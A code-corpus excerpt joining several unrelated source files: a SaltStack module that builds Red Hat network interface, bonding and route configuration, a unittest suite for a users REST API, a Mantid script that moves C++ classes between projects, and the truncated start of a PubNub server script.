bond['arp_ip_target'] = bond['arp_ip_target'] + ',' + ip
else:
bond['arp_ip_target'] = ip
else:
_raise_error_iface(iface, 'arp_ip_target', valid)
else:
_raise_error_iface(iface, 'arp_ip_target', valid)
else:
_raise_error_iface(iface, 'arp_ip_target', valid)
if 'arp_interval' in opts:
try:
int(opts['arp_interval'])
bond.update({'arp_interval': opts['arp_interval']})
except Exception:
_raise_error_iface(iface, 'arp_interval', ['integer'])
else:
_log_default_iface(iface, 'arp_interval', bond_def['arp_interval'])
bond.update({'arp_interval': bond_def['arp_interval']})
return bond
def _parse_settings_bond_1(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond1.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '1'}
for binding in ['miimon', 'downdelay', 'updelay']:
if binding in opts:
try:
int(opts[binding])
bond.update({binding: opts[binding]})
except Exception:
_raise_error_iface(iface, binding, ['integer'])
else:
_log_default_iface(iface, binding, bond_def[binding])
bond.update({binding: bond_def[binding]})
if 'use_carrier' in opts:
if opts['use_carrier'] in _CONFIG_TRUE:
bond.update({'use_carrier': '1'})
elif opts['use_carrier'] in _CONFIG_FALSE:
bond.update({'use_carrier': '0'})
else:
valid = _CONFIG_TRUE + _CONFIG_FALSE
_raise_error_iface(iface, 'use_carrier', valid)
else:
_log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
bond.update({'use_carrier': bond_def['use_carrier']})
return bond
def _parse_settings_bond_2(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond2.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '2'}
valid = ['list of ips (up to 16)']
if 'arp_ip_target' in opts:
if isinstance(opts['arp_ip_target'], list):
if 1 <= len(opts['arp_ip_target']) <= 16:
bond.update({'arp_ip_target': ''})
for ip in opts['arp_ip_target']: # pylint: disable=C0103
if len(bond['arp_ip_target']) > 0:
bond['arp_ip_target'] = bond['arp_ip_target'] + ',' + ip
else:
bond['arp_ip_target'] = ip
else:
_raise_error_iface(iface, 'arp_ip_target', valid)
else:
_raise_error_iface(iface, 'arp_ip_target', valid)
else:
_raise_error_iface(iface, 'arp_ip_target', valid)
if 'arp_interval' in opts:
try:
int(opts['arp_interval'])
bond.update({'arp_interval': opts['arp_interval']})
except Exception:
_raise_error_iface(iface, 'arp_interval', ['integer'])
else:
_log_default_iface(iface, 'arp_interval', bond_def['arp_interval'])
bond.update({'arp_interval': bond_def['arp_interval']})
if 'primary' in opts:
bond.update({'primary': opts['primary']})
if 'hashing-algorithm' in opts:
valid = ['layer2', 'layer2+3', 'layer3+4']
if opts['hashing-algorithm'] in valid:
bond.update({'xmit_hash_policy': opts['hashing-algorithm']})
else:
_raise_error_iface(iface, 'hashing-algorithm', valid)
return bond
def _parse_settings_bond_3(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond3.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '3'}
for binding in ['miimon', 'downdelay', 'updelay']:
if binding in opts:
try:
int(opts[binding])
bond.update({binding: opts[binding]})
except Exception:
_raise_error_iface(iface, binding, ['integer'])
else:
_log_default_iface(iface, binding, bond_def[binding])
bond.update({binding: bond_def[binding]})
if 'use_carrier' in opts:
if opts['use_carrier'] in _CONFIG_TRUE:
bond.update({'use_carrier': '1'})
elif opts['use_carrier'] in _CONFIG_FALSE:
bond.update({'use_carrier': '0'})
else:
valid = _CONFIG_TRUE + _CONFIG_FALSE
_raise_error_iface(iface, 'use_carrier', valid)
else:
_log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
bond.update({'use_carrier': bond_def['use_carrier']})
return bond
def _parse_settings_bond_4(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond4.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '4'}
for binding in ['miimon', 'downdelay', 'updelay', 'lacp_rate', 'ad_select']:
if binding in opts:
if binding == 'lacp_rate':
if opts[binding] == 'fast':
opts.update({binding: '1'})
if opts[binding] == 'slow':
opts.update({binding: '0'})
valid = ['fast', '1', 'slow', '0']
else:
valid = ['integer']
try:
int(opts[binding])
bond.update({binding: opts[binding]})
except Exception:
_raise_error_iface(iface, binding, valid)
else:
_log_default_iface(iface, binding, bond_def[binding])
bond.update({binding: bond_def[binding]})
if 'use_carrier' in opts:
if opts['use_carrier'] in _CONFIG_TRUE:
bond.update({'use_carrier': '1'})
elif opts['use_carrier'] in _CONFIG_FALSE:
bond.update({'use_carrier': '0'})
else:
valid = _CONFIG_TRUE + _CONFIG_FALSE
_raise_error_iface(iface, 'use_carrier', valid)
else:
_log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
bond.update({'use_carrier': bond_def['use_carrier']})
if 'hashing-algorithm' in opts:
valid = ['layer2', 'layer2+3', 'layer3+4']
if opts['hashing-algorithm'] in valid:
bond.update({'xmit_hash_policy': opts['hashing-algorithm']})
else:
_raise_error_iface(iface, 'hashing-algorithm', valid)
return bond
def _parse_settings_bond_5(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond5.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '5'}
for binding in ['miimon', 'downdelay', 'updelay']:
if binding in opts:
try:
int(opts[binding])
bond.update({binding: opts[binding]})
except Exception:
_raise_error_iface(iface, binding, ['integer'])
else:
_log_default_iface(iface, binding, bond_def[binding])
bond.update({binding: bond_def[binding]})
if 'use_carrier' in opts:
if opts['use_carrier'] in _CONFIG_TRUE:
bond.update({'use_carrier': '1'})
elif opts['use_carrier'] in _CONFIG_FALSE:
bond.update({'use_carrier': '0'})
else:
valid = _CONFIG_TRUE + _CONFIG_FALSE
_raise_error_iface(iface, 'use_carrier', valid)
else:
_log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
bond.update({'use_carrier': bond_def['use_carrier']})
return bond
def _parse_settings_bond_6(opts, iface, bond_def):
'''
Filters given options and outputs valid settings for bond6.
If an option has a value that is not expected, this
function will log what the Interface, Setting and what it was
expecting.
'''
bond = {'mode': '6'}
for binding in ['miimon', 'downdelay', 'updelay']:
if binding in opts:
try:
int(opts[binding])
bond.update({binding: opts[binding]})
except Exception:
_raise_error_iface(iface, binding, ['integer'])
else:
_log_default_iface(iface, binding, bond_def[binding])
bond.update({binding: bond_def[binding]})
if 'use_carrier' in opts:
if opts['use_carrier'] in _CONFIG_TRUE:
bond.update({'use_carrier': '1'})
elif opts['use_carrier'] in _CONFIG_FALSE:
bond.update({'use_carrier': '0'})
else:
valid = _CONFIG_TRUE + _CONFIG_FALSE
_raise_error_iface(iface, 'use_carrier', valid)
else:
_log_default_iface(iface, 'use_carrier', bond_def['use_carrier'])
bond.update({'use_carrier': bond_def['use_carrier']})
return bond
def _parse_settings_eth(opts, iface_type, enabled, iface):
'''
Filters given options and outputs valid settings for a
network interface.
'''
result = {'name': iface}
if 'proto' in opts:
valid = ['none', 'bootp', 'dhcp']
if opts['proto'] in valid:
result['proto'] = opts['proto']
else:
_raise_error_iface(iface, opts['proto'], valid)
if 'dns' in opts:
result['dns'] = opts['dns']
result['peerdns'] = 'yes'
if 'mtu' in opts:
try:
result['mtu'] = int(opts['mtu'])
except ValueError:
_raise_error_iface(iface, 'mtu', ['integer'])
if iface_type not in ['bridge']:
ethtool = _parse_ethtool_opts(opts, iface)
if ethtool:
result['ethtool'] = ethtool
if iface_type == 'slave':
result['proto'] = 'none'
if iface_type == 'bond':
bonding = _parse_settings_bond(opts, iface)
if bonding:
result['bonding'] = bonding
if iface_type not in ['bond', 'vlan', 'bridge', 'ipip']:
if 'addr' in opts:
if salt.utils.validate.net.mac(opts['addr']):
result['addr'] = opts['addr']
else:
_raise_error_iface(iface, opts['addr'], ['AA:BB:CC:DD:EE:FF'])
else:
# If interface type is slave for bond, not setting hwaddr
if iface_type != 'slave':
ifaces = __salt__['network.interfaces']()
if iface in ifaces and 'hwaddr' in ifaces[iface]:
result['addr'] = ifaces[iface]['hwaddr']
if iface_type == 'bridge':
result['devtype'] = 'Bridge'
bypassfirewall = True
valid = _CONFIG_TRUE + _CONFIG_FALSE
for opt in ['bypassfirewall']:
if opt in opts:
if opts[opt] in _CONFIG_TRUE:
bypassfirewall = True
elif opts[opt] in _CONFIG_FALSE:
bypassfirewall = False
else:
_raise_error_iface(iface, opts[opt], valid)
if bypassfirewall:
__salt__['sysctl.persist']('net.bridge.bridge-nf-call-ip6tables', '0')
__salt__['sysctl.persist']('net.bridge.bridge-nf-call-iptables', '0')
__salt__['sysctl.persist']('net.bridge.bridge-nf-call-arptables', '0')
else:
__salt__['sysctl.persist']('net.bridge.bridge-nf-call-ip6tables', '1')
__salt__['sysctl.persist']('net.bridge.bridge-nf-call-iptables', '1')
__salt__['sysctl.persist']('net.bridge.bridge-nf-call-arptables', '1')
else:
if 'bridge' in opts:
result['bridge'] = opts['bridge']
if iface_type == 'ipip':
result['devtype'] = 'IPIP'
for opt in ['my_inner_ipaddr', 'my_outer_ipaddr']:
if opt not in opts:
_raise_error_iface(iface, opts[opt], ['1.2.3.4'])
else:
result[opt] = opts[opt]
if iface_type == 'ib':
result['devtype'] = 'InfiniBand'
for opt in ['ipaddr', 'master', 'netmask', 'srcaddr', 'delay', 'domain', 'gateway', 'zone']:
if opt in opts:
result[opt] = opts[opt]
for opt in ['ipv6addr', 'ipv6gateway']:
if opt in opts:
result[opt] = opts[opt]
for opt in ['ipaddrs', 'ipv6addrs']:
if opt in opts:
result[opt] = opts[opt]
if 'ipv6_autoconf' in opts:
result['ipv6_autoconf'] = opts['ipv6_autoconf']
if 'enable_ipv6' in opts:
result['enable_ipv6'] = opts['enable_ipv6']
valid = _CONFIG_TRUE + _CONFIG_FALSE
for opt in ['onparent', 'peerdns', 'peerntp', 'slave', 'vlan', 'defroute', 'stp']:
if opt in opts:
if opts[opt] in _CONFIG_TRUE:
result[opt] = 'yes'
elif opts[opt] in _CONFIG_FALSE:
result[opt] = 'no'
else:
_raise_error_iface(iface, opts[opt], valid)
if 'onboot' in opts:
log.warning(
'The \'onboot\' option is controlled by the \'enabled\' option. '
'Interface: {0} Enabled: {1}'.format(iface, enabled)
)
if enabled:
result['onboot'] = 'yes'
else:
result['onboot'] = 'no'
# If the interface is defined then we want to always take
# control away from non-root users; unless the administrator
# wants to allow non-root users to control the device.
if 'userctl' in opts:
if opts['userctl'] in _CONFIG_TRUE:
result['userctl'] = 'yes'
elif opts['userctl'] in _CONFIG_FALSE:
result['userctl'] = 'no'
else:
_raise_error_iface(iface, opts['userctl'], valid)
else:
result['userctl'] = 'no'
# This vlan is in opts, and should be only used in range interface
# will affect jinja template for interface generating
if 'vlan' in opts:
if opts['vlan'] in _CONFIG_TRUE:
result['vlan'] = 'yes'
elif opts['vlan'] in _CONFIG_FALSE:
result['vlan'] = 'no'
else:
_raise_error_iface(iface, opts['vlan'], valid)
if 'arpcheck' in opts:
if opts['arpcheck'] in _CONFIG_FALSE:
result['arpcheck'] = 'no'
if 'ipaddr_start' in opts:
result['ipaddr_start'] = opts['ipaddr_start']
if 'ipaddr_end' in opts:
result['ipaddr_end'] = opts['ipaddr_end']
if 'clonenum_start' in opts:
result['clonenum_start'] = opts['clonenum_start']
return result
def _parse_routes(iface, opts):
'''
Filters given options and outputs valid settings for
the route settings file.
'''
# Normalize keys
opts = dict((k.lower(), v) for (k, v) in six.iteritems(opts))
result = {}
if 'routes' not in opts:
_raise_error_routes(iface, 'routes', 'List of routes')
for opt in opts:
result[opt] = opts[opt]
return result
def _parse_network_settings(opts, current):
'''
Filters given options and outputs valid settings for
the global network settings file.
'''
# Normalize keys
opts = dict((k.lower(), v) for (k, v) in six.iteritems(opts))
current = dict((k.lower(), v) for (k, v) in six.iteritems(current))
result = {}
valid = _CONFIG_TRUE + _CONFIG_FALSE
if 'enabled' not in opts:
try:
opts['networking'] = current['networking']
_log_default_network('networking', current['networking'])
except ValueError:
_raise_error_network('networking', valid)
else:
opts['networking'] = opts['enabled']
if opts['networking'] in valid:
if opts['networking'] in _CONFIG_TRUE:
result['networking'] = 'yes'
elif opts['networking'] in _CONFIG_FALSE:
result['networking'] = 'no'
else:
_raise_error_network('networking', valid)
if 'hostname' not in opts:
try:
opts['hostname'] = current['hostname']
_log_default_network('hostname', current['hostname'])
except Exception:
_raise_error_network('hostname', ['server1.example.com'])
if opts['hostname']:
result['hostname'] = opts['hostname']
else:
_raise_error_network('hostname', ['server1.example.com'])
if 'nozeroconf' in opts:
if opts['nozeroconf'] in valid:
if opts['nozeroconf'] in _CONFIG_TRUE:
result['nozeroconf'] = 'true'
elif opts['nozeroconf'] in _CONFIG_FALSE:
result['nozeroconf'] = 'false'
else:
_raise_error_network('nozeroconf', valid)
for opt in opts:
if opt not in ['networking', 'hostname', 'nozeroconf']:
result[opt] = opts[opt]
return result
def _raise_error_iface(iface, option, expected):
'''
Log and raise an error with a logical formatted message.
'''
msg = _error_msg_iface(iface, option, expected)
log.error(msg)
raise AttributeError(msg)
def _raise_error_network(option, expected):
'''
Log and raise an error with a logical formatted message.
'''
msg = _error_msg_network(option, expected)
log.error(msg)
raise AttributeError(msg)
def _raise_error_routes(iface, option, expected):
'''
Log and raise an error with a logical formatted message.
'''
msg = _error_msg_routes(iface, option, expected)
log.error(msg)
raise AttributeError(msg)
def _read_file(path):
'''
Reads and returns the contents of a file
'''
try:
with salt.utils.fopen(path, 'rb') as contents:
# without newlines character. http://stackoverflow.com/questions/12330522/reading-a-file-without-newlines
lines = contents.read().splitlines()
try:
lines.remove('')
except ValueError:
pass
return lines
except Exception:
return [] # Return empty list for type consistency
def _write_file_iface(iface, data, folder, pattern):
'''
Writes a file to disk
'''
filename = os.path.join(folder, pattern.format(iface))
if not os.path.exists(folder):
msg = '{0} cannot be written. {1} does not exist'
msg = msg.format(filename, folder)
log.error(msg)
raise AttributeError(msg)
fout = salt.utils.fopen(filename, 'w')
fout.write(data)
fout.close()
def _write_file_network(data, filename):
'''
Writes a file to disk
'''
fout = salt.utils.fopen(filename, 'w')
fout.write(data)
fout.close()
def _read_temp(data):
lines = data.splitlines()
try: # Discard newlines if they exist
lines.remove('')
except ValueError:
pass
return lines
def build_bond(iface, **settings):
'''
Create a bond script in /etc/modprobe.d with the passed settings
and load the bonding kernel module.
CLI Example:
.. code-block:: bash
salt '*' ip.build_bond bond0 mode=balance-alb
'''
rh_major = __grains__['osrelease'][:1]
opts = _parse_settings_bond(settings, iface)
try:
template = JINJA.get_template('conf.jinja')
except jinja2.exceptions.TemplateNotFound:
log.error('Could not load template conf.jinja')
return ''
data = template.render({'name': iface, 'bonding': opts})
_write_file_iface(iface, data, _RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface))
path = os.path.join(_RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface))
if rh_major == '5':
__salt__['cmd.run'](
'sed -i -e "/^alias\\s{0}.*/d" /etc/modprobe.conf'.format(iface),
python_shell=False
)
__salt__['cmd.run'](
'sed -i -e "/^options\\s{0}.*/d" /etc/modprobe.conf'.format(iface),
python_shell=False
)
__salt__['file.append']('/etc/modprobe.conf', path)
__salt__['kmod.load']('bonding')
if settings['test']:
return _read_temp(data)
return _read_file(path)
def build_interface(iface, iface_type, enabled, **settings):
'''
Build an interface script for a network interface.
CLI Example:
.. code-block:: bash
salt '*' ip.build_interface eth0 eth <settings>
'''
if __grains__['os'] == 'Fedora':
rh_major = '6'
else:
rh_major = __grains__['osrelease'][:1]
iface = iface.lower()
iface_type = iface_type.lower()
if iface_type not in _IFACE_TYPES:
_raise_error_iface(iface, iface_type, _IFACE_TYPES)
if iface_type == 'slave':
settings['slave'] = 'yes'
if 'master' not in settings:
msg = 'master is a required setting for slave interfaces'
log.error(msg)
raise AttributeError(msg)
if iface_type == 'vlan':
settings['vlan'] = 'yes'
if iface_type == 'bridge':
__salt__['pkg.install']('bridge-utils')
if iface_type in ['eth', 'bond', 'bridge', 'slave', 'vlan', 'ipip', 'ib']:
opts = _parse_settings_eth(settings, iface_type, enabled, iface)
try:
template = JINJA.get_template('rh{0}_eth.jinja'.format(rh_major))
except jinja2.exceptions.TemplateNotFound:
log.error(
'Could not load template rh{0}_eth.jinja'.format(
rh_major
)
)
return ''
ifcfg = template.render(opts)
if 'test' in settings and settings['test']:
return _read_temp(ifcfg)
_write_file_iface(iface, ifcfg, _RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}')
path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}'.format(iface))
return _read_file(path)
def build_routes(iface, **settings):
'''
Build a route script for a network interface.
CLI Example:
.. code-block:: bash
salt '*' ip.build_routes eth0 <settings>
'''
template = 'rh6_route_eth.jinja'
if __grains__['osrelease'][0] < 6:
template = 'route_eth.jinja'
log.debug('Template name: ' + template)
iface = iface.lower()
opts = _parse_routes(iface, settings)
log.debug("Opts: \n {0}".format(opts))
try:
template = JINJA.get_template(template)
except jinja2.exceptions.TemplateNotFound:
log.error(
'Could not load template {0}'.format(template)
)
return ''
opts6 = []
opts4 = []
for route in opts['routes']:
ipaddr = route['ipaddr']
if salt.utils.validate.net.ipv6_addr(ipaddr):
opts6.append(route)
else:
opts4.append(route)
log.debug("IPv4 routes:\n{0}".format(opts4))
log.debug("IPv6 routes:\n{0}".format(opts6))
routecfg = template.render(routes=opts4)
routecfg6 = template.render(routes=opts6)
if settings['test']:
routes = _read_temp(routecfg)
routes.extend(_read_temp(routecfg6))
return routes
_write_file_iface(iface, routecfg, _RH_NETWORK_SCRIPT_DIR, 'route-{0}')
_write_file_iface(iface, routecfg6, _RH_NETWORK_SCRIPT_DIR, 'route6-{0}')
path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route-{0}'.format(iface))
path6 = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route6-{0}'.format(iface))
routes = _read_file(path)
routes.extend(_read_file(path6))
return routes
def down(iface, iface_type):
'''
Shutdown a network interface
CLI Example:
.. code-block:: bash
salt '*' ip.down eth0
'''
# Slave devices are controlled by the master.
if iface_type not in ['slave']:
return __salt__['cmd.run']('ifdown {0}'.format(iface))
return None
def get_bond(iface):
'''
Return the content of a bond script
CLI Example:
.. code-block:: bash
salt '*' ip.get_bond bond0
'''
path = os.path.join(_RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface))
return _read_file(path)
def get_interface(iface):
'''
Return the contents of an interface script
CLI Example:
.. code-block:: bash
salt '*' ip.get_interface eth0
'''
path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}'.format(iface))
return _read_file(path)
def up(iface, iface_type): # pylint: disable=C0103
'''
Start up a network interface
CLI Example:
.. code-block:: bash
salt '*' ip.up eth0
'''
# Slave devices are controlled by the master.
if iface_type not in ['slave']:
return __salt__['cmd.run']('ifup {0}'.format(iface))
return None
def get_routes(iface):
'''
Return the contents of the interface routes script.
CLI Example:
.. code-block:: bash
salt '*' ip.get_routes eth0
'''
path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route-{0}'.format(iface))
path6 = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route6-{0}'.format(iface))
routes = _read_file(path)
routes.extend(_read_file(path6))
return routes
def get_network_settings():
'''
Return the contents of the global network script.
CLI Example:
.. code-block:: bash
salt '*' ip.get_network_settings
'''
return _read_file(_RH_NETWORK_FILE)
def apply_network_settings(**settings):
'''
Apply global network configuration.
CLI Example:
.. code-block:: bash
salt '*' ip.apply_network_settings
'''
if 'require_reboot' not in settings:
settings['require_reboot'] = False
if 'apply_hostname' not in settings:
settings['apply_hostname'] = False
hostname_res = True
if settings['apply_hostname'] in _CONFIG_TRUE:
if 'hostname' in settings:
hostname_res = __salt__['network.mod_hostname'](settings['hostname'])
else:
log.warning(
'The network state sls is trying to apply hostname '
'changes but no hostname is defined.'
)
hostname_res = False
res = True
if settings['require_reboot'] in _CONFIG_TRUE:
log.warning(
'The network state sls is requiring a reboot of the system to '
'properly apply network configuration.'
)
res = True
else:
res = __salt__['service.restart']('network')
return hostname_res and res
def build_network_settings(**settings):
'''
Build the global network script.
CLI Example:
.. code-block:: bash
salt '*' ip.build_network_settings <settings>
'''
# Read current configuration and store default values
current_network_settings = _parse_rh_config(_RH_NETWORK_FILE)
# Build settings
opts = _parse_network_settings(settings, current_network_settings)
try:
template = JINJA.get_template('network.jinja')
except jinja2.exceptions.TemplateNotFound:
log.error('Could not load template network.jinja')
return ''
network = template.render(opts)
if settings['test']:
return _read_temp(network)
# Write settings
_write_file_network(network, _RH_NETWORK_FILE)
return _read_file(_RH_NETWORK_FILE)
|
smallyear/linuxLearn
|
salt/salt/modules/rh_ip.py
|
Python
|
apache-2.0
| 36,314
|
import argparse
import unittest
import os
from api.api import Resource
#argument parsing
parser = argparse.ArgumentParser(description='MOO Technical Test - Code Test Two.',
epilog="Support Contact: justin.albertyn@gmail.com")
parser.add_argument('-v, --verbose', dest='verbose', action='store_true')
args = parser.parse_args()
class APITester(unittest.TestCase):
def test_list_attributes_about_user(self):
"""
As a client of this API, I want to be able to:
Get a list of the following attributes about
a user
* Name
* Username
* Email
* Phone
* Website
"""
users = Resource("users")
attribute_dict = users.get_attr_list_by_id("1",["name", "username", "email", "phone", "website"])
rhs = sorted(list(attribute_dict.keys()))
lhs = sorted(["name", "username", "email", "phone", "website"])
self.assertEqual(rhs, lhs)
def test_retrieve_invalid_user(self):
"""
As a client of this API, I want to be able to:
Get a 404 status code when retrieving the
details of an invalid user
"""
users = Resource("users")
user_object = users.get_by_id("10000")
rhs = user_object["response_code"]
lhs = 404
self.assertEqual(rhs, lhs)
def test_retrieve_valid_user(self):
"""
As a client of this API, I want to be able to:
Get a 200 status code when retrieving the
details of a valid user
"""
users = Resource("users")
user_object = users.get_by_id("1")
rhs = user_object["response_code"]
lhs = 200
self.assertEqual(rhs, lhs)
def test_create_new_user(self):
"""
As a client of this API, I want to be able to:
Create a new user
"""
users = Resource("users")
new_user = {'id': 10,
'name': 'Justin Albertyn',
'username': 'Jay',
'email': 'justin.albertyn@gmail.com',
'address': {
'street': 'Diasy Lane',
'suite': '30',
'city': 'London',
'zipcode': 'EC10 1FW',
'geo': {'lat': '-37.3159', 'lng': '81.1496'}
},
'phone': '1-770-736-8031 x56442', 'website':
'hildegard.org',
'company': {'name': 'Madiba.tech',
'catchPhrase': 'Happy Technology',
'bs': 'We are technology'
}
}
rhs = users.create(new_user)
lhs = 201
self.assertEqual(rhs, lhs)
def test_delete_user(self):
"""
As a client of this API, I want to be able to:
Delete a user
"""
users = Resource("users")
rhs = users.delete("1")
lhs = 200
self.assertEqual(rhs, lhs)
def test_get_header_attr_list_for_user(self):
"""
As a client of this API, I want to be able to:
See the following fields in the header of a
response when getting a list of users:
* Cache-Control => public
* Connection => keep-alive
* Content-Type => application/json
"""
users = Resource("users")
attribute_dict = users.get_header_attr_list_for_resource(["Connection","Cache-Control","Content-Type"])
rhs = sorted(list(attribute_dict.keys()))
lhs = sorted(["Connection","Cache-Control","Content-Type"])
self.assertEqual(rhs, lhs)
def test_update_valid_user(self):
"""
As a client of this API, I want to be able to:
edit/update a users details, expecting
a succesful (200) HTTP response.
"""
users = Resource("users")
update_user = {'username': 'Jay'}
rhs = users.update('1', update_user)
lhs = 200
self.assertEqual(rhs, lhs)
def test_update_invalid_user(self):
"""
As a client of this API, I want to be able to:
recieve an HTTP response 404 (not found) when
attempting to edit/update a user that does not
exist.
"""
users = Resource("users")
update_user = {'username': 'Jay'}
rhs = users.update('1000', update_user)
lhs = 404
self.assertEqual(rhs, lhs)
if __name__ == "__main__":
unittest.main()
|
justin-albertyn/moo
|
api_tester.py
|
Python
|
mit
| 5,745
|
#!/usr/bin/env python
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
""" Utility for moving a class file to a different project."""
from __future__ import (absolute_import, division, print_function, unicode_literals)
import argparse
import datetime
import os
import re
import sys
from cmakelists_utils import *
#======================================================================
def move_one(subproject, classname, newproject, newclassname, oldfilename, newfilename, args):
"""Move one file """
# Move the file
try:
cmd = "mv " + oldfilename + " " + newfilename
cmd = cmd.replace("\\","/")
if not args.no_vcs:
cmd = "git " + cmd
print("Running:", cmd)
retval = os.system(cmd)
if retval != 0:
raise RuntimeError("Error executing cmd '{}'".format(cmd))
f = open(newfilename, 'r')
text = f.read()
f.close()
# Replace any includes of it
text = text.replace("Mantid" + subproject + "/" + args.source_subfolder + classname + ".h",
"Mantid" + newproject + "/" + args.dest_subfolder + newclassname + ".h")
#Replace the guard
old_guard = "MANTID_{}_{}_H_".format(subproject.upper(), classname.upper())
new_guard = "MANTID_{}_{}_H_".format(newproject.upper(), newclassname.upper())
text = text.replace(old_guard, new_guard)
# Replace the namespace declaration
text = text.replace("namespace " + subproject, "namespace " + newproject)
# Replace the contents
f = open(newfilename, 'w')
f.write(text)
except RuntimeError as err:
print(err)
#======================================================================
def move_all(subproject, classname, newproject, newclassname, args):
# Directory at base of subproject
basedir, header_folder = find_basedir(args.project, subproject)
newbasedir, new_header_folder = find_basedir(args.project, newproject)
headerfile = os.path.join(basedir, "inc/" + header_folder + "/" + args.source_subfolder + classname + ".h")
sourcefile = os.path.join(basedir, "src/" + args.source_subfolder + classname + ".cpp")
testfile = os.path.join(basedir, "test/" + classname + "Test.h")
newheaderfile = os.path.join(newbasedir, "inc/" + new_header_folder + "/" + args.dest_subfolder + newclassname + ".h")
newsourcefile = os.path.join(newbasedir, "src/" + args.dest_subfolder + newclassname + ".cpp")
newtestfile = os.path.join(newbasedir, "test/" + args.dest_subfolder + newclassname + "Test.h")
if args.header and not overwrite and os.path.exists(newheaderfile):
print("\nError! Header file {} already exists. Use --force to overwrite.\n".format(newheaderfile))
return
if args.cpp and not overwrite and os.path.exists(newsourcefile):
print("\nError! Source file {} already exists. Use --force to overwrite.\n".format(newsourcefile))
return
if args.test and not overwrite and os.path.exists(newtestfile):
print("\nError! Test file {} already exists. Use --force to overwrite.\n".format(newtestfile))
return
print()
if args.header:
move_one(subproject, classname, newproject, newclassname, headerfile, newheaderfile, args)
if args.cpp:
move_one(subproject, classname, newproject, newclassname, sourcefile, newsourcefile, args)
if args.test:
move_one(subproject, classname, newproject, newclassname, testfile, newtestfile, args)
# Insert into the cmake list
remove_from_cmake(subproject, classname, args, args.source_subfolder)
add_to_cmake(newproject, newclassname, args, args.dest_subfolder)
print(" Files were removed to Framework/{}/CMakeLists.txt !".format(subproject))
print(" Files were added to Framework/{}/CMakeLists.txt !".format(newproject))
print()
#======================================================================
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Utility to move a Mantid class from one project to another. '
'Please note, you may still have more fixes to do to get compilation!')
parser.add_argument('subproject', metavar='SUBPROJECT', type=str,
help='The subproject under Framework/; e.g. Kernel')
parser.add_argument('classname', metavar='CLASSNAME', type=str,
help='Name of the class to move')
parser.add_argument('newproject', metavar='NEWPROJECT', type=str,
help='Name of the project to which to move the class.')
parser.add_argument('newclassname', metavar='NEWCLASSNAME', type=str,
help='Name of the new class.')
parser.add_argument('--force', dest='force', action='store_const',
const=True, default=False,
help='Force overwriting existing files. Use with caution!')
parser.add_argument('--no-vcs', dest='no_vcs', action='store_const',const=True,
default=False,
help='Can be used to move a class that is not yet under version control. Default: False')
parser.add_argument('--no-header', dest='header', action='store_const',
const=False, default=True,
help="Don't move the header file")
parser.add_argument('--no-test', dest='test', action='store_const',
const=False, default=True,
help="Don't move the test file")
parser.add_argument('--no-cpp', dest='cpp', action='store_const',
const=False, default=True,
help="Don't move the cpp file")
parser.add_argument('--source-subfolder', dest='source_subfolder',
default="",
help='The source is in a subfolder below the main part of the project, e.g. Geometry/Instrument.')
parser.add_argument('--dest-subfolder', dest='dest_subfolder',
default="",
help='The destination is in a subfolder below the main part of the project, e.g. Geometry/Instrument.')
parser.add_argument('--project', dest='project',
default="Framework",
help='The project in which this goes. Default: Framework. Can be MantidQt, Vates')
args = parser.parse_args()
subproject = args.subproject
newproject = args.newproject
classname = args.classname
newclassname = args.newclassname
overwrite = args.force
# Make sure the subfolders end with a /
if args.source_subfolder != "":
if args.source_subfolder[-1:] != "/":
args.source_subfolder += "/"
if args.dest_subfolder != "":
if args.dest_subfolder[-1:] != "/":
args.dest_subfolder += "/"
move_all(subproject, classname, newproject, newclassname, args)
|
mganeva/mantid
|
buildconfig/move_class.py
|
Python
|
gpl-3.0
| 7,196
|
import pymongo
from pymongo import MongoClient
import datetime
import pytz
import math
import time
import datetime
from pubnub import Pubnub
import threading
import logging
pub_key ='pub-c-f2fc0469-ad0f-4756-be0c-e003d1392d43'
sub_key ='sub-c-4d48a9d8-1c1b-11e6-9327-02ee2ddab7fe'
LOG_FILENAME = 'TTO_serverlogs.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,format='%(asctime)s, %(levelname)s, %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
g_minit = 10
g_sleepTime = 580
g_divCompare = 3
# Dictionaries and Lists to store the Data
client_data = {}
beforeJourneyClientList = {}
startedJourneyClientList = {}
commonClientIDList = []
commonStartedClientIDList = []
zone_ttimedct = {"NEWARK-EDISON":["US/Eastern",1719],"BROOKLYN-DENVILLE":["US/Eastern",2921],"MOUNTZION RADIOLOGY CENTER-SF GENERAL HOSPITAL":["US/Pacific",767]}
'''****************************************************************************************
Function Name : publish_handler (pubnub operation)
Description : Function used to publish the data to the client
Parameters : channel - UUID of the client
result - The result i.e., The dictionary contains recommendations or alerts
****************************************************************************************'''
def publish_handler(channel,result):
try:
